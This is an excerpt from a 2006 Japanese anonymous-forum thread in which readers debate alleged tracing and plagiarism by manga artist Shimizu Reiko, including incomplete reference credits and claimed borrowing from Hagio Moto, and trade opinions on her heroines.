365 :364:2006/09/30(土) 23:57:44 ID:???0
あ、病気じゃないのに病鉢巻だからか。
そりゃそうだ。

366 :花と名無しさん:2006/10/01(日) 01:01:50 ID:???0
この人の描くキスシーンはけっこう好きだ。
美術館の前のショナとセツとか、家具屋の晶と由とか。
あとはマジックの。名前忘れたが。なんだっけな、奴ら。
ちょっとスローテンポになるような演出?これも
何かをインスパイヤかな??

367 :花と名無しさん:2006/10/01(日) 01:04:38 ID:???0
この人の描くキスシーン、人工呼吸のようだと思ってたw

368 :花と名無しさん:2006/10/01(日) 03:04:16 ID:???0
>>361
確か本の名前は出してなかったですよ。

博物館の名前だけ……ちゃんとした引用先の表記じゃなかった。


アレほど有名なものなので、さすがに突っ込まれてイヤイヤ乗せた風なんだ
ろうなあと思ってた。


369 :花と名無しさん:2006/10/01(日) 15:29:15 ID:???0
コミックス引っ張り出して確認してみたら

参考文献
・フィレンツェ”ラ・スペコラ”博物館 写真集

て書いてあるね。
通常なら発行年数や出版元、編者とか訳者も
載せるべきなんだろうけど。詳しいことは分かんないや。


370 :花と名無しさん:2006/10/01(日) 15:36:29 ID:???0
>>369
それ確か雑誌掲載と初版じゃなかったんじゃなかったっけ。

しかもそれだと参考とか引用の場合は記述が不足なんだよね。
スペコラ関連で手に入りやすいのは3冊ほどあるんだけど、そのどれか
わかんないし。

前にも書かれてたけど「写真集」からもパクってるしなあ。


371 :花と名無しさん:2006/10/01(日) 17:59:14 ID:???0
・フィレンツェ”ラ・スペコラ”博物館 写真集

これだとモデルが分かっただけだからね。
(……まあ、他は一切シカトしてるあたり、まだマシな方なんだろうけど)


372 :花と名無しさん:2006/10/01(日) 20:48:25 ID:???0
しかも、初版〜何版かは「ス コ ペラ」とか
表記したんじゃなかった?
失礼にもほどがある。

373 :花と名無しさん:2006/10/01(日) 23:59:17 ID:???O
それが事実なら、シミズンもシミズンだが編集も編集だな。

374 :花と名無しさん:2006/10/02(月) 00:14:21 ID:???0
既出ならスルーよろ

平山郁夫画伯の「ブルーモスクの夜」が竜のお城とかぶる。
少しは変えてるけど、尖塔が特徴的
参考> ttp://withart.co.jp/new015-02-06.jpg

あと家具やの5巻161頁に出てくる李家の塔。
平山画伯のシルクロードの絵に同じような塔の絵がある。
塔の屋根は、李家のだともっと悪趣味にゴテゴテしている。
ある盗作作家の検証ページで、パクられとして家具やの方の画像を
見ていたのが皮肉にも気付いたきっかけ。
パクは安易にパクされると思った。

375 :花と名無しさん:2006/10/02(月) 01:23:20 ID:???0
>>374
これってタージマハルなんじゃ?
だとしたら別段この絵をパクったとかじゃないと思うんだけど
(タージマハル関連の写真をパクったのかも試練けどなー)

376 :花と名無しさん:2006/10/02(月) 01:28:36 ID:???0
どっちにしろパクリなんだよな。


377 :花と名無しさん:2006/10/02(月) 01:41:57 ID:???O
お見舞いの花が開ききってるのが気になってたんだけど、画集から本歌取りしてるんですね。
花が開き切ってるわけです。

378 :花と名無しさん:2006/10/02(月) 10:02:09 ID:???0
>>372
それは誤植の可能性もあるからシミズンを責めるのはなんとも。
あくまで可能性だけどさ。

379 :花と名無しさん:2006/10/02(月) 10:04:02 ID:???0
しかしシミズンの目トレースは誤植並の歪みっぷり。
もういっそのこと本気トレースにすりゃいいのに。
で、「○○をトレースしました」と巻末にずらりと一覧並べればいい。

380 :花と名無しさん:2006/10/02(月) 10:17:47 ID:???0
>>378
ちゃんと資料本を把握してないってことかなーと思った。
誌名名指ししてないしなあ。
何冊かばさばさ適当に扱って、誌名を出せないで「兎に角全部○○博物館の」
って包括的な指示したんだろうなー。

博物館自体を取材して写真とか撮らせてもらってから使う作家さんもいるけ
ど、そういう人とはまた表記が違うしね。


381 :花と名無しさん:2006/10/02(月) 20:35:10 ID:???0
>378
だから誤植に気づかないのも失礼だってこと。
どこまで軽んじてるのか、と。

382 :花と名無しさん:2006/10/02(月) 20:43:00 ID:???0
シミズン、つめが甘い

383 :花と名無しさん:2006/10/02(月) 22:50:17 ID:???0
誤植に気付いてもすぐ次の増刷分で直せるとは限らないんじゃ。
すごく重要な一文とかならまだしも、参考資料の部分だし。
(参考資料だから誤植OKって意味じゃないよ)

384 :花と名無しさん:2006/10/02(月) 23:04:16 ID:???0
>次の増刷分で直せるとは限らない
へえ、そうなんだ、知らなかった。

それはともかく、参考資料の部分こそ一番重要だと思うんだけど…
だって他人様の物だよ?
私もやっぱり失礼極まりないとかんじるなぁ。

385 :花と名無しさん:2006/10/02(月) 23:09:20 ID:???0
出版仕事前してたけど、誤植は簡単に直せるよ。
(絵はものによるけど、でも再販まで間に合わんとかありえん)

つーか本つくりなんか昔と違って随分早くなったもんさー。

つまりいつもの無礼な泥棒様ってことだろ。


386 :花と名無しさん:2006/10/02(月) 23:37:51 ID:???0
>次の増刷分で直せるとは限らない

信者って、こういういい加減な情報や想像で擁護するからなー。

387 :花と名無しさん:2006/10/03(火) 00:11:06 ID:???0
編集部も問題。ちゃんと確認しないと。

388 :花と名無しさん:2006/10/03(火) 00:44:03 ID:???0
>それはともかく、参考資料の部分こそ一番重要だと思うんだけど…

普通はそうだよね。
万が一クレームとか来ると怖いし。


389 :花と名無しさん:2006/10/03(火) 09:25:27 ID:???0
>383だけど、信者じゃないっすよ。擁護といわれるだろうなとは思ってたけど。
以前別の漫画で、誤植があったんだけど2〜3回後の増刷分でしか訂正できずに
漫画家さんがなげいてたことがあったので、気付いてもすぐに直せないんだなと
思っただけです。
資料集扱いや、指摘されなければバックレたりしてるのは本当にどうかと
思ってますよ。


390 :花と名無しさん:2006/10/03(火) 14:26:32 ID:???0
>>389
それを書かずに383だけ書くと、推測だけで書いてる風に見えるからなあ。

増刷がすごく早いとかだと色々事情で差はあるだろうけど普通は間に合うよ。


391 :花と名無しさん:2006/10/03(火) 15:07:43 ID:???0
では編集も無能ということでおK?

392 :花と名無しさん:2006/10/03(火) 15:18:30 ID:???0
白癬はパクリとかには割と無神経。
最近は少し増しになったけど昔は酷かった。

じゃなきゃ山田並み兵とか飼わんわな。

でもパク大物としてはやっぱ清水さんのほうが大物だよね……



393 :花と名無しさん:2006/10/03(火) 22:17:00 ID:???0
波平はある意味シミズンと同等のDQNだと思うがなー

394 :花と名無しさん:2006/10/04(水) 00:10:13 ID:???0
パク度はともかく…
DQN度で波平と同等というのはいかがなものか


395 :花と名無しさん:2006/10/04(水) 00:18:27 ID:???0
>>392
> 白癬はパクリとかには割と無神経。
> 最近は少し増しになったけど昔は酷かった。

最近でもスゴイのいたよね。
名前忘れたけど、山口さんの踊場ホテルのストーリーを丸パクした新人だか投稿者だか。
何人かが問い合わせても、誠意ある対応はナシ。

て、スレ違いか。スマソ。

396 :花と名無しさん:2006/10/04(水) 00:34:39 ID:???0
いつの間にか白癬はDQNのたまり場になってるよね。
昔はいいマンガが多かったものだが。

せめてパクんなよ。ドロミズ。


397 :花と名無しさん:2006/10/04(水) 02:35:22 ID:???0
花ゆめでぼく地球・GWが連載中の頃
(LaLaだとCIPHERとかパッションパレードが連載してた頃?)が
白癬が一番輝いていた時期だった…と、思う

その頃ってシミズンは竜の眠る星辺りを描いてたんだよね

398 :花と名無しさん:2006/10/04(水) 06:39:26 ID:???0
天女来週に似た漫画投稿した奴いたな。
男の子がバスケやってて、着物の女が出てくるの。
日本髪が描けなかったのか、天女がただの長髪で、実はそいつは男というオチ。
ララの方に載って、これはパクリ指摘されて賞取り消しになったんだっけ。
看板作家パクる投稿者の神経もすごいが、うっかり賞をあげてしまうなんて
どっちもどっちだと思った。


399 :花と名無しさん:2006/10/04(水) 06:47:30 ID:???0
伊藤潤二のナメクジ少女はもっとすご……
ってキリがねえなw

編集がマンガ読まないところも多いらしいしね。

でもそれで結局ヘタレたり衰退してってんじゃないのかねえ。
清水の劣化とか見てるとそう思う。


400 :花と名無しさん:2006/10/04(水) 22:24:33 ID:???0
(σ・Д・)σ400ゲッツ!!

401 :花と名無しさん:2006/10/06(金) 13:51:21 ID:???0
清水さんてインスパイヤ作家だったのかー。
決めゴマの構図やらすごく綺麗で神がかってる!!と感動してたのですが
パクリだったのですね。

先日、この人の文庫版を読んでて、ある話にもんのすごいデジャビューを
感じ、そーだ萩尾望都センセのまんがと同じなんだと気づくも
どちらも大好きな作家さんだったので気づかぬフリというか
そーういう事もあるさと何となくスルーしてしまってたんだけど、
そーかそういうことかorz

確かに萩尾センセは素晴らしい作家だと思うから、
強く影響されるのも分からないでもないけど・・・
ありゃ"影響を受けてる"てレベルじゃないお

402 :花と名無しさん:2006/10/06(金) 15:18:09 ID:???0
>>401
それなんて話?

萩尾パクは初出かもだよ。


403 :花と名無しさん:2006/10/06(金) 15:24:17 ID:???0
シミズンは漫画読まないってどっかで書いてたから
>>401が本当ならパクって無いよ、というポーズだったのかも
パクという自覚があってパクってるみたいだから、清水の場合。

404 :花と名無しさん:2006/10/06(金) 16:42:32 ID:???0
24年組と親しいマンガ家さん(その人自身もその頃デビューした方)と知り合いなんだけど
何年か前にその人に「清水玲子が好き」と言ったら
「あー…あの人は…まあ…(ごにょごにょ)」と言葉を濁されたことがある

その方曰く
「清水さんは、24年組を筆頭に、古参のマンガ家からは好かれてはいない」
…という事らしいよ

405 :花と名無しさん:2006/10/06(金) 18:10:43 ID:???0
>>401
>>402ではないが、マジでそれなんて話?
清水がパクラーなのは事実で、何を読んでもパクリに見えちゃうのは仕方ないが、
主観による言いがかりみたいなのはちょっとなあ。
他者の作品とテーマがかぶってるというくらいなら、清水でなくても、
それこそ萩尾さんの作品でもあることだし。
ともあれ、作品名がわからんと検証もできん。


>>403  シミズンは漫画読まないってどっかで書いてたから
この発言は知らないけど、ジミーの英国少年ぽい雰囲気は、
ポーのエドガーをめざした、てコメントが月の子コミックスに書いてなかったっけ?


406 :花と名無しさん:2006/10/06(金) 18:26:07 ID:???0
つか、シミズンは萩尾好きを公言してるよね?
萩尾さんの文庫の解説とかやってたし。

>>404
うろ覚えのソース無しで申し訳ないけど、
萩尾さんて以前、好きな漫画家とか気になる漫画家ってことで、シミズンの名前を挙げてた気ガス。
萩尾スレで読んだのかな? 知ってる人いたら補足してください。スマン。

407 :花と名無しさん:2006/10/06(金) 19:08:15 ID:???0
萩尾さんからは、ツチノコに関して雑誌のインタビューだったか
文庫版のあとがきだったかで何か書いてた希ガス。
お気に入りキャラはギルだとか・・・

>その方曰く
>「清水さんは、24年組を筆頭に、古参のマンガ家からは好かれてはいない」
>…という事らしいよ

ま、当然といえば当然ですな。
24年組の先生方に対して、そう思うなら声をあげろよとも思うが。
堂々と同業者の批判をしちゃいけないっていうマンガ業界内のお約束が
結果的にシミズンのような作家を放し飼いしてるんだからさ。

408 :401:2006/10/06(金) 19:22:08 ID:???0
あー。今すぐ手元にその文庫がないからタイトルうろ覚えですが・・・
「ノアの方舟」?とかだったかな?文庫版「ミルキーウェイ」に
載ってたと思う。
どこページの何コマ目がパクリ、とかではなくストーリー設定がとても似ていると感じた。
主人公がコンピュータの中に入ってて事故に遭うシーンは「11人いる!」や「ラーギニー」ぽいし、
その主人公には婚約者つぅか恋人がいて中性的なルックスで男言葉で話してるっていうのと
ほぼ同じ設定が萩尾作品にもある(タイトル失念、その作品でも主人公は
コンピュータ技師みたいな感じで事故に遭ってたと思う)
事故に遭いつつも助けられた主人公が、コンピュータミスで一定期間の記憶を失っていて
幼い頃の記憶しか残っておらず、数日後だかに再度記憶を注入され元に戻る、っていう設定も
萩尾作品の中にあったと思う。
とにかく色んな作品の設定をちょこっとずつツギハギしてる感じ。
さらに主人公の見た目・服装も、いかにも萩尾的センスというか。
まぁこの人の初期のSF作品はいずれも萩尾さんの影響が色濃く出ていると思う
好きなんだろーなぁとは思ったけど、さすがにこれだけ設定をあちこち似てるとねぇ・・・
偶然ではない気がするんですが。

>>405
確かに、テーマがかぶるのはよくある事だから、主観による言いがかりと
言われると、そんな気もしてきたw
なんかヒマしてて、清水玲子読む直前に萩尾全作品読破とかしたから
余計に気になったのかもしれん。

409 :花と名無しさん:2006/10/06(金) 19:28:14 ID:???0
「ノアの宇宙船」に関してはかなり萩尾に影響を受けてる、と言っていいと思う。
主人公の服装が萩尾の「スター・レッド」に似てるとか色々あるけど、
さすがに「パクリ」とまでは思わないし。
…その後、どんどんエスカレートして
目トレスにストーリーコピペまでする作家になっちゃうとは
当時は思わなかったけど。

410 :403:2006/10/06(金) 20:03:45 ID:???0
>>405
コミックス売っちゃったので確かめようが無くて申し訳ないんだけど
漫画読まないってのは何処かで書いてたんだ。

だからこの人はコマ割が変なのかな、とか失礼な感想を自分は持って
印象が強かったからそう書いていたのは確かなんだがソースが…スマソ

411 :花と名無しさん:2006/10/06(金) 20:13:39 ID:???0
そもそも清水がセクスレスや女装・男装を描いたり、SF的な作風なのは
萩尾から影響を受けたのが大きいと思う。
結局それも表層的なものに留まってしまったけれど。
主人公男が美形でライバルの女が外見も中身も悪い意味で女臭く、
ヒロインはショートカットの男まさり、ってのは作者本人の願望が強そうだが。

412 :花と名無しさん:2006/10/07(土) 12:18:52 ID:???0
まあ、読者自身の願望、少女マンガの王道でもあるからな。
<女としては冴えない自分が女らしいライバルに勝って美形男と結ばれる

413 :花と名無しさん:2006/10/07(土) 13:30:58 ID:???0
なるほど!

414 :花と名無しさん:2006/10/07(土) 19:01:16 ID:???0
確かに
>女としては冴えない自分が女らしいライバルに勝って美形男と結ばれる
ってのは王道ではあるけど、清水のヒロインって最初は中性的イメージなのに
どんどん女の嫌な部分の集大成みたいになっていくのはなんでだろう。
良し悪しは別としてもベタなヒロインは「外見は平凡だけどひとつとりえがある」とか
「性格美人」だったりするんだけど、ジミーも晶も無性だけどエレナも、感情的で
肝心なところでなよっとしてたり、かわいくないワガママだったり、泣きまくったり。

415 :花と名無しさん:2006/10/07(土) 21:37:25 ID:???0
>>414
それだよそれだよ。私がエレナにムカツク理由。
外側は中性的だが中身は完全なボーダー女。自分の欲望を全うする為に
自分自身を人質にとって男を脅す。

416 :花と名無しさん:2006/10/07(土) 21:41:31 ID:???0
萩尾の「メッシュ」みたいなの描きたかったんじゃないの。
無垢で傷つきやすく凶暴で、みたいな。
でも、ストーリーのヘボ展開にあわせて超ご都合主義なただの性悪バカになっちゃったが。

417 :花と名無しさん:2006/10/07(土) 21:48:30 ID:???0
月の子が好きな作品だからってのもあるんだろうが
ジミ−は結構好きだったけどなあ
最後にアートとくっついた時は素直に嬉しかった

418 :花と名無しさん:2006/10/07(土) 22:35:33 ID:???0
ジミーはまあ純真だったのでまだ可愛かったな。
エレナもある意味純真なのかもしれんが、どうも内面の魅力が
(設定上の)外見の魅力に釣り合ってないような。

419 :花と名無しさん:2006/10/07(土) 22:39:08 ID:???0
あれだけDQNなエレナに惚れたジャックはスゴス…

420 :花と名無しさん:2006/10/07(土) 23:30:54 ID:???0
批判も擁護もない昌にワロス

421 :花と名無しさん:2006/10/07(土) 23:34:03 ID:???0
昌て晶のことかw
晶はキャラとして成立すらしていないから、
キャラクターとして語ることすら出来ない。

422 :花と名無しさん:2006/10/08(日) 00:20:19 ID:???0
つか、そもそも
>主人公男が美形でライバルの女が外見も中身も悪い意味で女臭く、
>ヒロインはショートカットの男まさり
というのはちょっと違くないか?
ジミーもエレナも(外見はともかく)男まさりという設定じゃないし、
晶にとって、まゆは主人公男をめぐってのライバルではないし。

>清水のヒロインってどんどん女の嫌な部分の集大成みたいになっていく
これには激しく同意だが。

ジャックはきちんとルイスとくっついてほしかった…。
気が強いのにけなげで、彼女の方がよっぽどヒロインだよなあ。

423 :花と名無しさん:2006/10/08(日) 00:43:44 ID:???0
>>414
ベタなヒロイン像はもともと狙ってないんじゃん、清水も。
みんな超絶美形て設定だから、いわゆる「読者の共感」なんて得られないし。
性格悪くてワガママ放題で陰険で棒涙でも、美人だからオケ!みたいなorz

424 :花と名無しさん:2006/10/08(日) 01:14:11 ID:???0
エレナはどんどん変化したわけではなく、
ハナっから一環して、ジャックの前では女っぽかったと思うけど。
あの見事なまでのツンデレぶりは嫌いじゃないぞw
>>415とは逆で、中世的な外見だからこそ良かった。
あれでベンジャミンのような女っぽい見た目だったらムカついてた気がするわ。
ジャックが出てこない話(タイトル失念、天才児を育てる?話)のクールなエレナも好きだけど。

問題は晶だ…orz 前半と中盤以降で性格変わりすぎやろ。

425 :花と名無しさん:2006/10/08(日) 04:28:32 ID:???0
>>424
エレナが女っぽい見た目だったら…て、まゆがまんまそうだよね。
晶以外にはなつかず、自分への好意を盾にとってワガママ放題。
でも、初期の「美少女」設定だった頃の彼女の、メンヘル的なワガママは好きだったな(トオイメ)。
晶や他のキャラの劣化ぶりもひどいけど、
まゆなんて中国行ってからはギャグ&晶マンセー要員のひとりに堕ち、
とってつけたような悲劇に見舞われつつも最終的には春蘭レベルの雑魚キャ(ry

>>422
MAGICが当てはまるよ。
>美形な男に、ライバルが女臭くてヒロインはショートカットの男まさり
ライバルってつまりは自分自身なわけだがw



426 :花と名無しさん:2006/10/08(日) 14:04:52 ID:???0
>>414
・やっぱり外見が平凡なのは嫌
・性格美人とか言うお世辞には飽き飽きなので美人のようにワガママを言ってみたい
→美しい外見だが中性、無性のためにヒーローとの恋愛に障害がある でFA

427 :花と名無しさん:2006/10/08(日) 18:22:35 ID:???0
FAしてるとこなんだけど、エレナや晶に恋愛の障害なんてあったっけ?
ジミーやMAGICのカナは、中性的だからというよりも子供だからというのが障害だったわけだし。
しかも後者はキンシンソーカ(ry


428 :花と名無しさん:2006/10/08(日) 18:56:40 ID:???0
まゆもエレナもワガママ言って晶やジャックを困らせてるトコは好きなんだけど。
やっぱ「自分への好意を盾にとって」というのが露骨になってくると、うへぇってなる。
あと唐突に「自分ってこんなに不幸なの」って言い出したりとかも。
とくにエレナの場合、本来プライド高いから同情を請うような愛情表現は似合わない。

429 :花と名無しさん:2006/10/09(月) 08:51:54 ID:???0
>自分への好意を盾にとって

エレナはジャックとルイスが付き合ってると思ってたんじゃなかったっけ?

430 :花と名無しさん:2006/10/10(火) 22:30:55 ID:???0
立ち寄ったブックオフで文庫かってパピヨン・マジック読み直したんだけど
すごく面白かったよ。流れるような曲線でやっぱり画面がきれいだね・・。
せりふの間がさ、静かでタイミングいいから登場人物の気持ちが
共有しやすいっていうか、読み終えた後に物悲しい気持ちがが消えないよ。
ここよんでかなり冷静だったけどつうっかりはまってしまった。
萩尾さんのぱくりであってもいいっかな〜っておもったよ。
萩尾さんの漫画自体全然知らないし。



431 :花と名無しさん:2006/10/10(火) 22:39:32 ID:p+t/+atV0
>>429
あの辺変だったよね。

一体ジャックをどう思ってるのかわかんないってw首捻った。
ルイスも可哀想なんだけど、天竜の子ども作った辺りは結構引いたなー。

あの頃にああいう話を読んでああいう関係(△とか恋愛自覚の無い人の恋愛)に
萌えたんだろうな。と今は思う。


432 :花と名無しさん:2006/10/10(火) 22:40:03 ID:???0
うわ、ごめん、久しぶりに書いたらクッキー切れてました。


433 :花と名無しさん:2006/10/10(火) 23:19:39 ID:???0
>>430
「確かに私は盗作したが、私のほうが面白い」って言い切った
昔の文豪って誰だっけか。

清水もここまで言えるほど立派な漫画描いてくれりゃいいんだけどね。
私はやっぱりここで言うなら萩尾さんのを読んでくれと思っちゃうよ。
や、人の感想に文句言ってるわけではないけど。

434 :花と名無しさん:2006/10/10(火) 23:20:49 ID:???0
>>430は釣りだよね?

435 :花と名無しさん:2006/10/10(火) 23:43:20 ID:???0
釣りじゃないよ。
でも私みたいに萩尾さんの漫画を知らずに読むと
目新しさも手伝ってか、妙に心にひっかかる。
萩尾さんは絵的に古く感じて、いまいち物語の中に
のめり込めないの。でももしかしたら萩尾さんのスピリットを
清水作品は多少なりとも継承してて私はそこに反応してるのかもね。
ここは私のような感想はNGなんだっけ?だとしたら流れ無視してゴメンね。


436 :花と名無しさん:2006/10/10(火) 23:43:38 ID:???0
いつもの人がこらえ切れなくなったんだろうけど、スルーする他ない。

パク話題が出始めて長いけど終わらないよなあ。
どんだけパクってんだ。


437 :花と名無しさん:2006/10/10(火) 23:45:20 ID:???0
↑430でした

438 :花と名無しさん:2006/10/10(火) 23:54:19 ID:???0
436>>437
ひどいわww

>萩尾さんは絵的に古く感じて、いまいち物語の中に
のめり込めないの。

読んでいないと言いながら設定にこんな穴が。


439 :430=435:2006/10/11(水) 00:11:30 ID:???0
>>438
ゴメンゴメン
厳密にいうと表紙をみてペラぺラと10ページぐらいは読んだことが
ある、って程度なの。
でも食わず嫌いよくないね。今度読んでみるよ。



440 :花と名無しさん:2006/10/11(水) 00:18:41 ID:???0
>>439
いや、読まなくていいよ。

>厳密にいうと表紙をみてペラぺラと10ページぐらいは読んだことが
>ある、って程度なの。

で、430みたいなこと書くのはアホだと思うわ(´∀`)



441 :花と名無しさん:2006/10/11(水) 00:22:01 ID:???0
「盗品でもいい」と言うことなのよね、430.


442 :花と名無しさん:2006/10/11(水) 00:24:59 ID:???O
萩尾さんが苦手だって人それぞれなんだから別にいいじゃないか…

443 :花と名無しさん:2006/10/11(水) 00:45:01 ID:???0
苦手なのはいいけど
他の作家の作品を貶めて持ち上げようとするのはどうかな

シミズンは作品をパクってるから元と比べられ批評されるのは当然だけど
逆はイカンでしょう

444 :花と名無しさん:2006/10/11(水) 00:52:25 ID:???0
430の意見のどこに萩尾への貶めがあるというのか…。
めちゃくちゃ気を使って書いてるように読めるが。
最近の流れ、重箱の隅をつついてるようにしか見えん。

それにしても、清水が萩尾パクラーってデフォになってないか?
明確な萩尾パクリなんてないと思うけど。
めちゃくちゃ影響受けてるにしろ、それ言いだしたら
萩尾の影響受けてる少女漫画家なんてゴマンといるぞ。

445 :花と名無しさん:2006/10/11(水) 01:00:16 ID:???0
>>444
>萩尾さんのぱくりであってもいいっかな〜っておもったよ。
>萩尾さんの漫画自体全然知らないし。

萩尾さんがどうこうじゃなく、特定の作家さんを引き合いに出したのは430だよ。
しかも「パクリでもいい」って…

最後の一行もどうかと思う。
(読まないことは別にどうでもいい。批判もいい。でも、「パクリでもいいよ、読ん
でないけど」って言い方は名指しする以上は失礼だ)


446 :花と名無しさん:2006/10/11(水) 01:01:11 ID:???0
荒れると嫌なので自己レス

444は別に擁護してるわけじゃないんで。
パクリと断罪するならソース出せ、
清水嫌いだとしても言いがかりはいかん、てこと。

447 :花と名無しさん:2006/10/11(水) 01:06:02 ID:???0
うわ、リロードし忘れ…
>>446の意見は
>>445の「明確な萩尾パクリなんてないと思うけど」にかかってますorz

448 :花と名無しさん:2006/10/11(水) 01:07:27 ID:???0
>>445 じゃなかった、>>444
もうドツボ… 逝ってきます。スレ汚し失礼

449 :花と名無しさん:2006/10/11(水) 01:34:39 ID:???0
430じゃないけど、
確かにオリジナルを見てなきゃパクリなんてどうでもいい罠
そもそも気づかないわけだし。
パクリの罪深さはそこにこそあるわけだが


450 :花と名無しさん:2006/10/11(水) 01:40:18 ID:???0
>>444
落ち着け!w

ちゅーかパクって意見はこのスレのちょっと前の方で出てるけど、そのときも
ワアワアそれで加熱しなかった。ソースは?と突っ込み入ってるし、アヤフヤ
な指摘だと誰も清水を非難はしない。

だけど430はわざわざ萩尾さんの名前を出して「読んでない」「パクリでいい」
……更に絵柄がどうのこうのと名前まで出して論ってる。
どう考えてもおかしいや、、430。

清水本人は好きだ、影響受けてると萩尾さんの名前出してるのに、それでこん
な言われようをするわけで、堪らんなあ、萩尾さんの方が。


451 :花と名無しさん:2006/10/11(水) 02:01:19 ID:???0
>>449
同意。

そしてそのオリジナルとの関連を隠そうとする泥水。


452 :花と名無しさん:2006/10/11(水) 02:50:28 ID:???0
>>430の人気に嫉妬w

亀レスだけど
>>433 アレクサンドル・デュマだよ>私の方が面白い発言
すごい開き直りだがデュマに言われちゃ納得するしかあるまいww
もちろん盗作はイクナイ!けど、
シミズンも家具屋中盤以降〜現在の劣化がなければ、ここまで叩かれることもなかっただろうに…。
作品について語ることがないからパクリばかりがスレを埋める。

453 :花と名無しさん:2006/10/11(水) 03:26:09 ID:???0
デュマのは「ネタ」パクで、大長編で、料理の仕方が特異なのと、文字なんで
一様に語れんよなあ。
勿論イイわけないけど、検証を見んことにはフランス語ゆえ難しいw
(言語的に文章が難しいので、作文能力ですごい差がつくと思う。同じネタでも)

汚水さんは何事も無ければ永遠の中堅で、「居るけど読まない人」みたいな
扱いをしている人も多かった。
好き嫌いの出ちゃうタイプだしな。


それが今じゃあパクスレでも定番だもんな。検証するまでも無い、どうせまたパ
クリでしょう?と、他のスレで言われてるんだよなあ。


454 :花と名無しさん:2006/10/11(水) 04:18:13 ID:???0
この人のパクってそんな知名度高いの?
良くも悪くも「永遠の中堅」だけにあまりパクラーだってこと知られてない気がするんだが。
割と<このシーンに感動した>的話題の時に、女王がモニーク運ぶとことか挙げる人多い。

>>452
>>シミズンも家具屋中盤以降〜現在の劣化がなければ、
>>ここまで叩かれることもなかっただろうに…。
なんかわかる気するわー。
清水の漫画を読まなくなったのって、パクリ云々よりもつまんなくなったから。
デュマじゃあるまいし面白いならパクでもオケ!なんて言う気はないけど、
パクリの宝庫とわかってても竜のコミクスは手放せない<パクラレ元が好きな人ゴメンヨ
輝夜は速攻売りましたがw

455 :花と名無しさん:2006/10/11(水) 04:23:08 ID:???0
>>454
家具屋あたりで色んな意味で知名度アップ。


456 :花と名無しさん:2006/10/11(水) 06:00:01 ID:???0
>>454 ノシ たまたまやってきたこのスレでつい最近知ったパクパクの事実…
かぐやは途中でポイしたけど、昔のSF作品は好きだっただけにガーン!!だったよ
この人のパクって絵だけなの?ストーリーもどっかからいただいてんの?
どちらかというと話重視で好きだったから後者だったら尚更ウヘァだ

457 :花と名無しさん:2006/10/11(水) 13:13:30 ID:???0
過去ログ嫁

458 :花と名無しさん:2006/10/11(水) 16:23:42 ID:???0
>>454
他作家のパクスレで何度か見かけた。
「ああ、パクの大御所…pgr」みたいなレスで。

他板でも見たので、作家としての知名度よりもパク知名度の方が競りあがって
きてるのは感じる。
(作家としては本当に、いつまでも小粒っつーか永遠の中堅だよな)

459 :花と名無しさん:2006/10/11(水) 19:21:11 ID:???0
2ちゃんで見る限りはパクラーとしての知名度あるな。
一般的にはあまり知られてないだろうけど、そもそも漫画家として
さほどメジャーじゃないだろうからね。永遠の中堅ってなんか納得。

460 :花と名無しさん:2006/10/11(水) 21:38:33 ID:???0
>>456
類似を指摘されているSFもあるけど、黒判定まではいってない。
ま、絵トレスと違ってストーリーは検証が難しいからね。

461 :花と名無しさん:2006/10/11(水) 22:25:40 ID:???0
>>460
の、割りに「パクラーだからどうせ・・・」的なレスの応酬で、デフォなイメージが形成されてる気がする。
擁護するわけじゃないんだけど、最近は絵のトレースとかのパクリの新ネタがないせいか、
ストーリー・キャラに対する不満や、gdgd感の指摘と「○○の影響じゃない?」「パクラーだから劣化した」って話が混ざっててなんか微妙。
「ソースがない話は過熱してない」ってレスもあったけど、過熱はしなくても灰色イメージはしっかり上塗りされてるっつーか。

多分>>444が感じてる違和感に近いのかな・・・・。








462 :花と名無しさん:2006/10/11(水) 22:27:14 ID:???0
>>461
一回やっちゃったらしょうがないよ。
パクのイメージは。

おまけにヘタレてて話すほどの作品じゃないのでは。



463 :花と名無しさん:2006/10/11(水) 22:27:21 ID:???0
ようは清水さんには
「あ、これってあの作品みたい」
と思わせられることが多すぎなんだよ。

464 :花と名無しさん:2006/10/11(水) 22:35:18 ID:???0
一回どころか大ゴマ毎にトレーストレーストレースだからさ。
調子乗ってやりすぎたんだよ、この人は。
しかも指摘されても「次からは服くらい変えます」だし。

465 :花と名無しさん:2006/10/11(水) 22:53:24 ID:???0
何かさー、昔はともかく竜アタリから、パクの目的が変わってきてるのを感じない?

嫌な言い方だし、これも駄目だけど、
「自分が描きたいものに合うものを見つけた → パク」
ではなく、
「綺麗な絵を見つけた → 無理やり組み込み」
みたいな……

だからパクシーンが浮き上がってて余計に辛いんだが。


466 :花と名無しさん:2006/10/11(水) 23:35:30 ID:???0
>>461
この期に及んでまた新しいトレース出てきたら、それこそもう終わりなんだが。


467 :花と名無しさん:2006/10/12(木) 00:25:26 ID:???0
のらくろ時代と違って、今どきのマンガは描きたいものに合わせて
参考資料集めないと何も描けないっていう現実があるし、
その過程でつい誘惑に負けて一線越えちゃった・・・だけなら
有罪ではあるけど情状酌量の余地はある。

それと比べると
「綺麗な絵を見つけた、萌えなエピソード見つけた→無理矢理組み込み」
結果、ストーリーも絵もgdgdになった罪は大きい。

犯罪って繰り返すたびにエスカレートするもんだなと実感。

468 :花と名無しさん:2006/10/12(木) 00:27:44 ID:???0
つか、やっぱ汚いよね。
法的に問題ない作品は丸パクしてるくせに。

469 :花と名無しさん:2006/10/12(木) 00:38:29 ID:???0
>>468
それって、まさかにんぎょひめやかぐやひめのこと言ってる?
いくらなんでもそれはお門違いだろうよ。オチツケ
違ってたらごめん。その場合の該当作を教えて。

470 :花と名無しさん:2006/10/12(木) 00:44:35 ID:???0
>489
は?
散々既出のミュシャ、パリッシュ、アルマのことだけど…
オマイサンがオチケツ。

471 :花と名無しさん:2006/10/12(木) 00:45:53 ID:???0
半狂乱の信者ウザ

472 :花と名無しさん:2006/10/12(木) 00:54:47 ID:???0
>>470
アンカー、アンカー!オケツチ

473 :花と名無しさん:2006/10/12(木) 01:01:06 ID:???0
>472
あいたたたたたたw
自分では平静のつもりだったんだけどw
あまりにとんちんかんなレスに舞い上がってしまた。
失礼しました。

474 :花と名無しさん:2006/10/12(木) 01:05:54 ID:???0
>>469はアレwだとしても、それを半狂乱のイ諸つうのはな…
このスレのどこを読んでも、もう信者なんていない気するけど。


475 :花と名無しさん:2006/10/12(木) 01:18:21 ID:???0
擁護しようにもしようがないからな
時として信者よりもアンチの方が一生懸命w

良くも悪くも、もう私は清水にはそれほど興味がないので、
(パクを生暖かくオチするのみ)
アンチでもまだ自分を気にかけてくれる人がいて良かったね、しみずん。

